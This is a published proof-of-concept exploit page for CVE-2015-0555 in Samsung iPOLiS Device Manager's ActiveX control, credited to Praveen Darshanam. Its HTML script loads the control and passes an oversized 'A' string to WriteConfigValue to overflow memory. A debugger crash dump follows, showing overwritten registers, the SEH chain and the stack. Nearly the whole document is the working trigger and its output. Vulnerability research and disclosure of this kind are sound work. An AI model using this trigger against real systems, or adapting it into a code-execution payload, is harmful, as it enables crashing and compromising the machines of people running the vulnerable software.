112 lines
No EOL
3 KiB
HTML
112 lines
No EOL
3 KiB
HTML
<!--
|
|
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
|
|
# Date: 22/02/2015
|
|
# Exploit Author: Praveen Darshanam
|
|
# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
|
|
# Version: Samsung iPOLiS 1.12.2
|
|
# Tested on: Windows 7 Ultimate N SP1
|
|
# CVE: 2015-0555
|
|
-->
|
|
|
|
<html>
|
|
<!--
|
|
Vulnerability found and PoC coded by Praveen Darshanam
|
|
http://blog.disects.com
|
|
CVE-2015-0555
|
|
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
|
|
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
|
|
memberName = "WriteConfigValue"
|
|
progid = "XNSSDKDEVICELib.XnsSdkDevice"
|
|
Operating System = Windows 7 Ultimate N SP1
|
|
Vulnerable Software = Samsung iPOLiS 1.12.2
|
|
CERT tried to coordinate but there wasn't any response from Samsung
|
|
-->
|
|
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
|
|
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
|
|
<script>
|
|
var arg1 = "";
|
|
var arg2="praveend";
|
|
|
|
for (i=0; i<= 15000; i++)
|
|
{
|
|
arg1 += "A";
|
|
}
|
|
|
|
target.WriteConfigValue(arg1 ,arg2);
|
|
|
|
</script>
|
|
</html>
|
|
|
|
<!--
|
|
#############Stack Trace####################
|
|
Exception Code: ACCESS_VIOLATION
|
|
Disasm: 149434 MOV AL,[ESI+EDX]
|
|
|
|
Seh Chain:
|
|
--------------------------------------------------
|
|
1 647C7D7D mfc100.dll
|
|
2 647D0937 mfc100.dll
|
|
3 64E242CA VBSCRIPT.dll
|
|
4 77B3E0ED ntdll.dll
|
|
|
|
|
|
Called From Returns To
|
|
--------------------------------------------------
|
|
XNSSDKDEVICE.149434 41414141
|
|
41414141 414141
|
|
414141 3DA4C4
|
|
3DA4C4 mfc100.647790C1
|
|
mfc100.647790C1 56746C75
|
|
|
|
|
|
Registers:
|
|
--------------------------------------------------
|
|
EIP 00149434
|
|
EAX 00003841
|
|
EBX 00609FB0 -> 0015A564
|
|
ECX 00003814
|
|
EDX 00414141
|
|
EDI 0000008F
|
|
ESI 0000008F
|
|
EBP 002BE5FC -> Asc: AAAAAAAAAAA
|
|
ESP 002BE564 -> 0000000C
|
|
|
|
|
|
Block Disassembly:
|
|
--------------------------------------------------
|
|
149423 XOR EDI,EDI
|
|
149425 XOR ESI,ESI
|
|
149427 MOV [EBP-8C],ECX
|
|
14942D TEST ECX,ECX
|
|
14942F JLE SHORT 00149496
|
|
149431 MOV EDX,[EBP+8]
|
|
149434 MOV AL,[ESI+EDX] <--- CRASH
|
|
149437 CMP AL,2F
|
|
149439 JNZ SHORT 00149489
|
|
14943B MOV ECX,EBX
|
|
14943D TEST ESI,ESI
|
|
14943F JNZ SHORT 0014944D
|
|
149441 PUSH 159F28
|
|
149446 CALL 0014F7C0
|
|
14944B JMP SHORT 00149476
|
|
|
|
|
|
ArgDump:
|
|
--------------------------------------------------
|
|
EBP+8 00414141
|
|
EBP+12 003DA4C4 -> Asc: defaultV
|
|
EBP+16 647790C1 -> EBE84589
|
|
EBP+20 FFFFFFFE
|
|
EBP+24 646CBE5C -> CCCCCCC3
|
|
EBP+28 0000001C
|
|
|
|
|
|
Stack Dump:
|
|
--------------------------------------------------
|
|
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
|
|
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
|
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
|
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
|
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
|
|
|
|
--> |